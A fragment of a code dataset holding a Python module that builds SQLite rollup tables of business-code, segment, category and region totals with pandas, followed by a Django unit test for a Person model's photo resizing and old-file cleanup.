"program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "base.base_train_multi.BaseTrainMulti", "line_number": 9, "usage_type": "name"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 30, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 50, "usage_type": "call"}, {"api_name": "time.time", "line_number": 53, "usage_type": "call"}, {"api_name": "time.time", "line_number": 60, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 62, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 83, "usage_type": "call"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 106, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 138, "usage_type": "call"}, {"api_name": "time.time", "line_number": 141, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 144, "usage_type": "call"}, {"api_name": "time.time", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 171, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 172, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 186, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 200, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 214, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 228, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 242, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 256, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 270, "usage_type": "call"}]}
+{"seq_id": "604964105", "text": "'''\nCreated on Dec 18, 2018\n\n@author: vahidrogo\n'''\n\nimport pandas as pd\nimport sqlite3 as sql\nimport threading\nfrom tkinter import messagebox as msg\n\nimport constants\nfrom progress import Progress\nimport utilities\n\n\nclass RollupTotals(threading.Thread):\n '''\n Parent class for SegmentTotals(), SegmentTotalsRegion(), \n CategoryTotals() and CategoryTotalsRegion().\n \n Creates a new table with the data fetched using the query \n set in each of the child classes.\n '''\n \n \n FIRST_QUARTER_COLUMN = 3\n \n\n def __init__(\n self, is_addon=False, is_category=True, is_region=False,\n is_business_code_totals=False\n ):\n super().__init__()\n \n self.is_addon = is_addon\n self.is_category = is_category\n self.is_region = is_region\n self.is_business_code_totals = is_business_code_totals\n \n self.title = constants.APP_NAME\n \n self.input_table_name = constants.BUSINESS_CODE_TOTALS_TABLE\n \n if self.is_addon:\n self.input_table_name += constants.ADDON_SUFFIX\n \n self.df = None\n \n self.query = ''\n self.rollup_id_name = ''\n self.rollup_table_name = ''\n \n \n def run(self):\n if self.is_addon:\n self.rollup_table_name += constants.ADDON_SUFFIX\n \n self.progress = Progress(self, self.title, abort=False)\n \n self.progress.update_progress(0, 'Fetching business code totals.')\n \n self._set_df()\n \n progress = 90 if self.is_region else 70\n \n self.progress.update_progress(progress, 'Preparing data.')\n \n if self.df is not None:\n # drops the old id column\n self.df.drop(constants.ID_COLUMN_NAME, axis=1, inplace=True)\n \n if not self.is_business_code_totals:\n # drops the business code id column\n self.df.drop(\n constants.BUSINESS_CODE_ID_COLUMN_NAME, axis=1, inplace=True\n )\n \n self._update_column_names()\n \n self._set_region_id_column()\n \n column_names = list(self.df)\n \n juri_column = (\n constants.REGION_ID_COLUMN_NAME if self.is_region \n else constants.TAC_COLUMN_NAME\n )\n \n # sets the columns that will be used in the table in the order \n # that they will be in\n new_column_names = [\n constants.ID_COLUMN_NAME, juri_column, self.rollup_id_name\n ] + column_names[self.FIRST_QUARTER_COLUMN:]\n \n self.df = self.df[new_column_names]\n \n self._group_by_new_id()\n \n progress = 95 if self.is_region else 85\n \n self.progress.update_progress(progress, 'Creating table.')\n \n self._create_table()\n \n self.progress.update_progress(100, 'Build complete.')\n \n self.progress.destroy()\n \n \n def _set_df(self):\n sql_code = 'ATTACH DATABASE ? AS ?'\n \n args = (str(constants.DB_PATHS[constants.STARS_DB]), constants.STARS_DB)\n \n con = sql.connect(\n constants.DB_PATHS[constants.STATEWIDE_DATASETS_DB], uri=True,\n timeout=constants.DB_TIMEOUT\n )\n \n db_attached = utilities.execute_sql(\n sql_code=sql_code, args=args, open_con=con, dontfetch=True\n )\n \n if db_attached:\n results = utilities.execute_sql(\n sql_code=self.query, open_con=con, getcursor=True\n )\n \n if results:\n column_names = [i[0] for i in results.description]\n \n data = results.fetchall()\n \n self.df = pd.DataFrame(data, columns=column_names)\n \n con.close()\n \n \n def _update_column_names(self):\n column_names = list(self.df)\n \n # changes column to \"id\" from \"new_id\"\n column_names[0] = constants.ID_COLUMN_NAME\n \n if self.is_region:\n tac_index = 1 if self.is_business_code_totals else 2\n \n # changes column to \"region_id\" from \"tac\"\n column_names[tac_index] = constants.REGION_ID_COLUMN_NAME\n \n # updates the column names in the dataframe\n self.df.columns = column_names\n \n \n def _set_region_id_column(self):\n # gets the regions id's from the id column\n region_id_column = self.df[\n constants.ID_COLUMN_NAME\n ].apply(lambda x: x.split('-')[0])\n \n self.df[constants.REGION_ID_COLUMN_NAME] = region_id_column\n \n\n def _group_by_new_id(self):\n column_names = list(self.df)\n \n group_columns = column_names[:self.FIRST_QUARTER_COLUMN]\n \n sum_columns = column_names[self.FIRST_QUARTER_COLUMN:]\n \n self.df = self.df.groupby(\n group_columns, as_index=False, sort=False\n )[sum_columns].sum()\n \n \n def _create_table(self):\n con = sql.connect(\n constants.DB_PATHS[constants.STATEWIDE_DATASETS_DB], \n timeout=constants.DB_TIMEOUT\n )\n \n try:\n with con:\n self.df.to_sql(\n self.rollup_table_name, con, if_exists='replace', \n index=False\n )\n \n except sql.OperationalError as e:\n msg.showerror(self.title, e)\n \n con.close()\n \n \nclass SegmentTotals(RollupTotals):\n '''\n Creates the \"segment_totals\" table in the \"statewide_datasets\"\n database. The table contains the amounts from the \n \"business_code_totals\" table also in \"statewide_datasets\" rolled\n up by \"segment_id\". The \"segment_id\" comes from the \"segments\" \n table in \"starsdb\" based on the \"business_code_id\" from the \n \"business_code_totals\" table.\n '''\n \n\n def __init__(self, is_addon=False):\n super().__init__(is_addon)\n \n self.title += ' - Segment Totals'\n \n self.query = f'''\n SELECT d.{constants.TAC_COLUMN_NAME} || '-' || \n s.{constants.ID_COLUMN_NAME} new_id, \n s.{constants.ID_COLUMN_NAME} {constants.SEGMENT_ID_COLUMN_NAME}, \n d.* \n \n FROM {self.input_table_name} d, \n {constants.STARS_DB}.{constants.BUSINESS_CODES_TABLE} b, \n {constants.STARS_DB}.{constants.SEGMENTS_TABLE} s\n \n WHERE d.{constants.BUSINESS_CODE_ID_COLUMN_NAME}\n =b.{constants.ID_COLUMN_NAME} \n AND b.{constants.SEGMENT_ID_COLUMN_NAME}\n =s.{constants.ID_COLUMN_NAME} \n '''\n \n self.rollup_id_name = constants.SEGMENT_ID_COLUMN_NAME\n \n self.rollup_table_name = 'segment_totals'\n \n self.start()\n \n \nclass SegmentTotalsRegion(RollupTotals):\n '''\n Creates the \"segment_totals_region\" table in the \"statewide_datasets\"\n database. The table contains the amounts from the \n \"business_code_totals\" table also in \"statewide_datasets\" rolled up by\n \"segment_id\" and \"region_id\". The \"segment_id\" comes from the \n \"segments\" table in \"starsdb\" based on the \"business_code_id\" from the \n \"business_code_otals\" table. The \"region_id\" comes from the \n \"jurisdictions\" table also in \"starsdb\".\n '''\n \n\n def __init__(self):\n super().__init__(is_region=True)\n \n self.title += ' - Segment Totals Region'\n \n self.query = f'''\n SELECT c.region_id || '-' || \n s.{constants.ID_COLUMN_NAME} new_id, \n s.{constants.ID_COLUMN_NAME} {constants.SEGMENT_ID_COLUMN_NAME}, \n d.*\n \n FROM {self.input_table_name} as d, \n {constants.STARS_DB}.{constants.BUSINESS_CODES_TABLE} b, \n {constants.STARS_DB}.{constants.COUNTIES_TABLE} c,\n {constants.STARS_DB}.{constants.SEGMENTS_TABLE} s,\n {constants.STARS_DB}.{constants.JURISDICTIONS_TABLE} j\n \n WHERE d.{constants.BUSINESS_CODE_ID_COLUMN_NAME}\n =b.{constants.ID_COLUMN_NAME}\n AND b.{constants.SEGMENT_ID_COLUMN_NAME}\n =s.{constants.ID_COLUMN_NAME}\n AND d.{constants.TAC_COLUMN_NAME}\n =j.{constants.TAC_COLUMN_NAME}\n AND j.{constants.COUNTY_ID_COLUMN_NAME}\n =c.{constants.ID_COLUMN_NAME}\n '''\n \n self.rollup_id_name = constants.SEGMENT_ID_COLUMN_NAME\n \n self.rollup_table_name = 'segment_totals_region'\n \n self.start()\n \n \nclass CategoryTotals(RollupTotals):\n '''\n Creates the \"category_totals\" table in the \"statewide_datasets\"\n database. The table contains the amounts from the \n \"business_code_totals\" table also in \"statewide_datasets\" rolled up by\n \"category_id\". The \"category_id\" comes from the \"segments\" table in \n \"starsdb\" based on the \"segment_id\" that comes from the \"business_codes\" \n table also in \"starsdb\". The \"segment_id\" is based on the \n \"business_code_id\" in the \"business_code_totals\" table.\n '''\n \n \n def __init__(self, is_addon=False):\n super().__init__(is_addon, is_category=True)\n \n self.title += ' - Category Totals'\n \n self.query = f'''\n SELECT d.{constants.TAC_COLUMN_NAME} || '-' || \n c.{constants.ID_COLUMN_NAME} as new_id, \n c.{constants.ID_COLUMN_NAME} as \n {constants.CATEGORY_ID_COLUMN_NAME}, d.* \n \n FROM {self.input_table_name} as d, \n {constants.STARS_DB}.{constants.BUSINESS_CODES_TABLE} as b, \n {constants.STARS_DB}.{constants.CATEGORIES_TABLE} as c, \n {constants.STARS_DB}.{constants.SEGMENTS_TABLE} as s \n \n WHERE d.{constants.BUSINESS_CODE_ID_COLUMN_NAME}\n =b.{constants.ID_COLUMN_NAME}\n AND b.{constants.SEGMENT_ID_COLUMN_NAME}\n =s.{constants.ID_COLUMN_NAME} \n AND s.{constants.CATEGORY_ID_COLUMN_NAME}\n =c.{constants.ID_COLUMN_NAME}\n '''\n \n self.rollup_id_name = constants.CATEGORY_ID_COLUMN_NAME\n \n self.rollup_table_name = 'category_totals'\n \n self.start()\n \n \nclass CategoryTotalsRegion(RollupTotals):\n '''\n Creates the \"category_totals_region\" table in the \"statewide_datasets\"\n database. The table contains the amounts from the \n \"business_code_totals\" table also in \"statewide_datasets\" rolled up \n by \"category_id\" and \"region_id\". The \"category_id\" comes from the \n \"segments\" table in \"starsdb\" based on the \"segment_id\" that comes \n from the \"business_codes\" table also in \"starsdb\". The \"segment_id\" \n is based on the \"business_code_id\" in the \"business_code_totals\" \n table. The \"region_id\" comes from the \"jurisdictions\" table in \n \"starsdb\". \n '''\n \n \n def __init__(self):\n super().__init__(is_region=True)\n \n self.title += ' - Category Totals Region'\n \n self.query = f'''\n SELECT co.region_id || '-' || \n c.{constants.ID_COLUMN_NAME} new_id, \n c.{constants.ID_COLUMN_NAME} {constants.CATEGORY_ID_COLUMN_NAME}, \n d.* \n \n FROM {self.input_table_name} d, \n {constants.STARS_DB}.{constants.BUSINESS_CODES_TABLE} b, \n {constants.STARS_DB}.{constants.COUNTIES_TABLE} co,\n {constants.STARS_DB}.{constants.CATEGORIES_TABLE} c, \n {constants.STARS_DB}.{constants.SEGMENTS_TABLE} s, \n {constants.STARS_DB}.{constants.JURISDICTIONS_TABLE} j\n \n WHERE d.{constants.BUSINESS_CODE_ID_COLUMN_NAME}\n =b.{constants.ID_COLUMN_NAME} \n AND b.{constants.SEGMENT_ID_COLUMN_NAME}\n =s.{constants.ID_COLUMN_NAME} \n AND s.{constants.CATEGORY_ID_COLUMN_NAME}\n =c.{constants.ID_COLUMN_NAME}\n AND d.{constants.TAC_COLUMN_NAME}\n =j.{constants.TAC_COLUMN_NAME}\n AND j.{constants.COUNTY_ID_COLUMN_NAME}\n =co.{constants.ID_COLUMN_NAME}\n '''\n \n self.rollup_id_name = constants.CATEGORY_ID_COLUMN_NAME\n \n self.rollup_table_name = 'category_totals_region'\n \n self.start()\n \n \nclass BusinessCodeTotalsRegion(RollupTotals):\n '''\n Creates the \"business_code_totals_region\" table in the \n \"statewide_datasets\" database. The table contains the amounts from \n the \"business_code_totals\" table also in the \"statewide_datasets\" \n rolled up by \"region_id\". The \"region_id\" comes form the \n \"jurisdictions\" table in \"starsdb\".\n '''\n \n \n def __init__(self):\n super().__init__(is_region=True, is_business_code_totals=True)\n \n self.title += ' - Business Code Totals Region'\n \n self.query = f'''\n SELECT co.region_id || '-' || \n d.{constants.BUSINESS_CODE_ID_COLUMN_NAME} new_id, \n d.* \n \n FROM {self.input_table_name} d, \n {constants.STARS_DB}.{constants.COUNTIES_TABLE} co,\n {constants.STARS_DB}.{constants.JURISDICTIONS_TABLE} j\n \n WHERE d.{constants.TAC_COLUMN_NAME}\n =j.{constants.TAC_COLUMN_NAME}\n AND j.{constants.COUNTY_ID_COLUMN_NAME}\n =co.{constants.ID_COLUMN_NAME}\n '''\n \n self.rollup_id_name = constants.BUSINESS_CODE_ID_COLUMN_NAME\n \n self.rollup_table_name = 'business_code_totals_region'\n \n self.start()\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n", "sub_path": "rolluptotals.py", "file_name": "rolluptotals.py", "file_ext": "py", "file_size_in_byte": 15103, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "threading.Thread", "line_number": 17, "usage_type": "attribute"}, {"api_name": "constants.APP_NAME", "line_number": 41, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_TOTALS_TABLE", "line_number": 43, "usage_type": "attribute"}, {"api_name": "constants.ADDON_SUFFIX", "line_number": 46, "usage_type": "attribute"}, {"api_name": "constants.ADDON_SUFFIX", "line_number": 57, "usage_type": "attribute"}, {"api_name": "progress.Progress", "line_number": 59, "usage_type": "call"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 71, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 76, "usage_type": "attribute"}, {"api_name": "constants.REGION_ID_COLUMN_NAME", "line_number": 86, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 87, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 93, "usage_type": "attribute"}, {"api_name": "constants.DB_PATHS", "line_number": 114, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 114, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 116, "usage_type": "call"}, {"api_name": "constants.DB_PATHS", "line_number": 117, "usage_type": "attribute"}, {"api_name": "constants.STATEWIDE_DATASETS_DB", "line_number": 117, "usage_type": "attribute"}, {"api_name": "constants.DB_TIMEOUT", "line_number": 118, "usage_type": "attribute"}, {"api_name": "utilities.execute_sql", "line_number": 121, "usage_type": "call"}, {"api_name": "utilities.execute_sql", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 135, "usage_type": "call"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 144, "usage_type": "attribute"}, {"api_name": "constants.REGION_ID_COLUMN_NAME", "line_number": 150, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 159, "usage_type": "attribute"}, {"api_name": "constants.REGION_ID_COLUMN_NAME", "line_number": 162, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 178, "usage_type": "call"}, {"api_name": "constants.DB_PATHS", "line_number": 179, "usage_type": "attribute"}, {"api_name": "constants.STATEWIDE_DATASETS_DB", "line_number": 179, "usage_type": "attribute"}, {"api_name": "constants.DB_TIMEOUT", "line_number": 180, "usage_type": "attribute"}, {"api_name": "sqlite3.OperationalError", "line_number": 190, "usage_type": "attribute"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 191, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 191, "usage_type": "name"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 213, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 214, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 215, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 215, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 219, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODES_TABLE", "line_number": 219, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 220, "usage_type": "attribute"}, {"api_name": "constants.SEGMENTS_TABLE", "line_number": 220, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 222, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 223, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 224, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 225, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 228, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 254, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 255, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 255, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 259, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODES_TABLE", "line_number": 259, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 260, "usage_type": "attribute"}, {"api_name": "constants.COUNTIES_TABLE", "line_number": 260, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 261, "usage_type": "attribute"}, {"api_name": "constants.SEGMENTS_TABLE", "line_number": 261, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 262, "usage_type": "attribute"}, {"api_name": "constants.JURISDICTIONS_TABLE", "line_number": 262, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 264, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 265, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 266, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 267, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 268, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 269, "usage_type": "attribute"}, {"api_name": "constants.COUNTY_ID_COLUMN_NAME", "line_number": 270, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 271, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 274, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 299, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 300, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 301, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 302, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 305, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODES_TABLE", "line_number": 305, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 306, "usage_type": "attribute"}, {"api_name": "constants.CATEGORIES_TABLE", "line_number": 306, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 307, "usage_type": "attribute"}, {"api_name": "constants.SEGMENTS_TABLE", "line_number": 307, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 309, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 310, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 311, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 312, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 313, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 314, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 317, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 345, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 346, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 346, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 350, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODES_TABLE", "line_number": 350, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 351, "usage_type": "attribute"}, {"api_name": "constants.COUNTIES_TABLE", "line_number": 351, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 352, "usage_type": "attribute"}, {"api_name": "constants.CATEGORIES_TABLE", "line_number": 352, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 353, "usage_type": "attribute"}, {"api_name": "constants.SEGMENTS_TABLE", "line_number": 353, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 354, "usage_type": "attribute"}, {"api_name": "constants.JURISDICTIONS_TABLE", "line_number": 354, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 356, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 357, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 358, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 359, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 360, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 361, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 362, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 363, "usage_type": "attribute"}, {"api_name": "constants.COUNTY_ID_COLUMN_NAME", "line_number": 364, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 365, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 368, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 392, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 396, "usage_type": "attribute"}, {"api_name": "constants.COUNTIES_TABLE", "line_number": 396, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 397, "usage_type": "attribute"}, {"api_name": "constants.JURISDICTIONS_TABLE", "line_number": 397, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 399, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 400, "usage_type": "attribute"}, {"api_name": "constants.COUNTY_ID_COLUMN_NAME", "line_number": 401, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 402, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 405, "usage_type": "attribute"}]}
+{"seq_id": "270111986", "text": "# -*- coding: utf-8 -*-\r\nfrom django.test import TestCase\r\nfrom apps.hello.models import Person\r\nfrom django.test.utils import override_settings\r\nfrom django.core.files.uploadedfile import SimpleUploadedFile\r\nimport os\r\nfrom django.conf import settings\r\nimport shutil\r\n\r\n\r\n@override_settings(MEDIA_ROOT=settings.MEDIA_TEST_ROOT)\r\nclass PersonModelTest(TestCase):\r\n\r\n def setUp(self):\r\n self.test_person = Person.objects.first()\r\n self.test_img_path = os.path.join(\r\n settings.BASE_DIR,\r\n 'assets/img/test_image.png'\r\n )\r\n with open(self.test_img_path, 'rb') as test_img:\r\n self.test_image_1 = SimpleUploadedFile(\r\n name='test_image_1.png',\r\n content=test_img.read(),\r\n content_type='image/png'\r\n )\r\n self.test_person.photo = self.test_image_1\r\n self.test_person.save()\r\n self.first_photo_file = self.test_person.photo.path\r\n\r\n def tearDown(self):\r\n test_dir = os.path.exists(settings.MEDIA_TEST_ROOT)\r\n if test_dir:\r\n shutil.rmtree(settings.MEDIA_TEST_ROOT)\r\n\r\n def test_save_method(self):\r\n \"\"\"Check, if model save method,\r\n save first person photo to proper filesystem path,\r\n and crop image to proper size\"\"\"\r\n self.assertTrue(os.path.exists(self.first_photo_file))\r\n self.assertEqual(\r\n self.first_photo_file,\r\n settings.MEDIA_TEST_ROOT + self.test_person.photo.name\r\n )\r\n self.assertTrue(\r\n self.test_person.photo.width <= 200 and\r\n self.test_person.photo.height <= 200\r\n )\r\n\r\n def test_save_method_remove_unused_img(self):\r\n \"\"\"Check, if model save method delete unused images\"\"\"\r\n with open(self.test_img_path, 'rb') as test_img:\r\n self.test_image_2 = SimpleUploadedFile(\r\n name='test_image_2.png',\r\n content=test_img.read(),\r\n content_type='image/png'\r\n )\r\n self.test_person.photo = self.test_image_2\r\n self.test_person.save()\r\n self.second_photo_file = self.test_person.photo.path\r\n self.assertTrue(os.path.exists(self.second_photo_file))\r\n self.assertFalse(os.path.exists(self.first_photo_file))\r\n", "sub_path": "apps/hello/tests/test_models.py", "file_name": "test_models.py", "file_ext": "py", "file_size_in_byte": 2300, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.test.TestCase", "line_number": 12, "usage_type": "name"}, {"api_name": "apps.hello.models.Person.objects.first", "line_number": 15, "usage_type": "call"}, {"api_name": "apps.hello.models.Person.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "apps.hello.models.Person", "line_number": 15, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.conf.settings.BASE_DIR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "django.core.files.uploadedfile.SimpleUploadedFile", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.conf.settings.MEDIA_TEST_ROOT", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 31, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 33, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_TEST_ROOT", "line_number": 33, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 33, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.conf.settings.MEDIA_TEST_ROOT", "line_number": 42, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 42, "usage_type": "name"}, {"api_name": "django.core.files.uploadedfile.SimpleUploadedFile", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "django.test.utils.override_settings", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_TEST_ROOT", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 11, "usage_type": "name"}]}
